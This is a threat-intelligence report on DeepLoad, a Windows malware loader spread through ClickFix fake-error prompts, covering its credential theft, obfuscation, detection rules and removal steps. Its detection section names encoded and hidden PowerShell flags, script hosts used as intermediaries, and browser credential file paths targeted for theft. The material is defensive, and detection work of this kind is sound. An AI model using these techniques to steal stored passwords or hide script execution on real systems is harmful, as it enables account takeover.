Key Takeaway
DeepLoad is a new malware loader delivered via the ClickFix social engineering tactic, identified by ReliaQuest researchers. It uses likely AI-assisted obfuscation and process injection to evade static detection, and begins stealing credentials and session tokens immediately upon execution — before the primary loader can be blocked. Windows endpoints without PowerShell restrictions or application control policies are the primary targets.
Malware Family and Delivery Mechanism
DeepLoad is a previously undocumented malware loader distributed via the ClickFix social engineering technique. Identified and named by ReliaQuest researchers, DeepLoad represents a new loader family designed to survive partial detection by initiating credential theft operations immediately upon execution — before any primary loader component can be blocked.
ClickFix is a well-documented delivery tactic in which victims are presented with fake error messages or CAPTCHA prompts that instruct them to manually execute malicious PowerShell or cmd commands by pasting them into a Run dialog or terminal. This technique bypasses many email gateway and browser-based controls because the user executes the payload directly. ClickFix has previously been associated with campaigns distributing NetSupport RAT, Lumma Stealer, and AsyncRAT, among others. DeepLoad now joins that list as a purpose-built loader specifically paired with this delivery method.
Capabilities
Persistence
DeepLoad establishes persistence on infected hosts through mechanisms consistent with other loaders in its class. Specific registry keys, scheduled tasks, or startup folder entries used by DeepLoad are under active analysis by ReliaQuest, but the loader's architecture is designed to survive reboots and partial remediation attempts.
Credential Theft and Exfiltration
The most operationally significant characteristic of DeepLoad is its immediate credential harvesting behavior. According to ReliaQuest researchers, credential theft initiates at the earliest stage of execution — capturing stored passwords and active session tokens from browsers and potentially other credential stores before the primary loader component completes deployment. This means that even if endpoint detection and response (EDR) tools or antivirus products block the loader's later-stage activity, the attacker may already have exfiltrated valid credentials and session cookies.
This design separates DeepLoad from loaders that gate exfiltration behind successful full-chain execution. SOC teams should treat any ClickFix-initiated execution event as a credential compromise incident regardless of whether the payload was subsequently quarantined.
Obfuscation and Evasion
ReliaQuest attributes DeepLoad's evasion capability to likely AI-assisted obfuscation combined with process injection techniques. The obfuscation targets static analysis engines, making signature-based detection unreliable against this loader. Process injection allows DeepLoad to execute within the memory space of legitimate processes, reducing behavioral detection surface against tools that rely on process creation telemetry alone.
The use of AI-assisted code obfuscation — where large language models or AI tooling are used to generate syntactically varied but functionally equivalent malicious code — produces payloads that defeat many YARA rules and static hash-based detection mechanisms. Each generated sample can present a unique byte sequence while preserving the same runtime behavior.
Command and Control (C2)
DeepLoad's C2 infrastructure details are still being characterized by ReliaQuest. The loader communicates with attacker-controlled infrastructure to receive secondary payloads and transmit harvested credentials. Organizations should monitor for anomalous outbound HTTP/S traffic from hosts that recently executed PowerShell via user-initiated Run dialog events.
Affected Platforms
DeepLoad targets Windows endpoints. The ClickFix delivery mechanism requires user interaction within a Windows environment (Run dialog, PowerShell, or cmd). No macOS or Linux variants have been identified at this stage of analysis.
High-risk targets include organizations where users have local execution permissions and where PowerShell is not constrained by Constrained Language Mode or application control policies such as Windows Defender Application Control (WDAC) or AppLocker.
Detection Signatures
SOC analysts should prioritize the following detection logic:
Process Execution Indicators
- PowerShell or cmd spawned directly from
explorer.exefollowing a user interaction event with no parent application context - Use of
mshta.exe,wscript.exe, orcscript.exeas intermediary execution hosts post-ClickFix prompt - Process injection into
svchost.exe,explorer.exe, or browser processes shortly after PowerShell execution
YARA Considerations
Due to AI-assisted obfuscation, static YARA rules targeting specific byte sequences will have limited coverage. Focus YARA rules on structural patterns: encoded PowerShell execution flags (-EncodedCommand, -Enc, -NoP, -W Hidden), and known ClickFix lure string patterns in script content.
SIEM Rules
- Alert on clipboard-paste execution patterns:
powershell.exewith command-line arguments characteristic of pasted, encoded commands - Correlate with browser credential store access events (
Login Data,CookiesSQLite files) occurring within seconds of PowerShell execution - Flag any access to
%APPDATA%\Local\Google\Chrome\User Data\Default\Login Dataor equivalent Firefox/Edge paths within 60 seconds of a suspicious process spawn
Network Detection
- Inspect for DNS lookups and HTTP/S connections to newly registered domains from host processes not normally initiating external connections
- Flag POST requests containing base64-encoded blobs to external IPs from PowerShell or injected processes
Removal Guidance
- Isolate the host immediately upon confirmed DeepLoad execution — do not wait for C2 confirmation before containment.
- Treat all stored credentials as compromised. Initiate forced password resets for the affected user account across all services. Invalidate active sessions and OAuth tokens.
- Revoke browser-stored credentials and session cookies enterprise-wide for the affected user. Notify downstream SaaS platforms if SSO tokens may have been captured.
- Run a full memory forensic capture before reimaging to support IOC extraction and C2 infrastructure identification.
- Reimage the affected endpoint. Given process injection and persistence mechanisms, in-place remediation is insufficient.
- Audit PowerShell execution policy and enforce Constrained Language Mode. Deploy WDAC or AppLocker policies to block unsigned script execution.
- Block ClickFix lure delivery vectors by enforcing web proxy policies that flag pages containing clipboard-hijacking JavaScript patterns.
ReliaQuest continues active analysis of DeepLoad. Organizations using ReliaQuest's GreyMatter platform should ensure threat intelligence feeds are current. No CVE IDs have been assigned to this campaign as no vulnerability exploitation has been confirmed — delivery relies entirely on user-initiated execution.
Original Source
The Hacker News
Related Articles
Horabot Dropper Delivers Casbaneiro Banking Trojan to Latin American and European Targets in Brazilian eCrime Campaign
The Horabot dropper, attributed to Brazilian cybercrime group Augmented Marauder (also tracked as Water Saci by Trend Micro), delivers the Casbaneiro banking trojan to Spanish-speaking users across Latin America and Europe via targeted phishing campaigns. Casbaneiro performs credential harvesting through overlay attacks, clipboard hijacking, and keylogging, and abuses compromised Outlook accounts to self-propagate. SOC teams should implement scheduled task creation detections, block newly registered TLD outbound connections, and immediately rotate credentials on any confirmed infected host.
REF1695: Fake Installers Deliver RATs and Cryptominers in CPA Fraud Operation Active Since November 2023
REF1695 is a financially motivated campaign tracked by Elastic Security Labs that has deployed RATs and cryptocurrency miners via fake software installers since November 2023. The operation monetizes infections through both passive cryptomining and CPA fraud, redirecting victims to content locker pages disguised as software registration flows. Windows endpoints are the confirmed target, and Elastic has released EQL detection rules to support identification and response.
Automated Service Enables Persistent Information-Stealing Social Engineering Attacks
A new cybercrime service automates persistent social engineering attacks aimed at stealing sensitive information. Targeting primarily Windows and mobile platforms, the service uses phishing techniques combined with encrypted exfiltration and adaptive persistence. Detection relies on monitoring phishing indicators and network anomalies, while removal requires credential resets and endpoint remediation.
NoVoice Android Malware Exploits Known Vulnerabilities to Gain Root Access, Found in 50+ Google Play Apps
NoVoice is a newly discovered Android malware exploiting known privilege escalation vulnerabilities to gain root access. Distributed through over 50 malicious apps on Google Play with 2.3 million downloads, it collects user data and communicates with encrypted C2 servers. Detection requires monitoring root-level activity and network anomalies, while removal demands a factory reset and patching affected devices.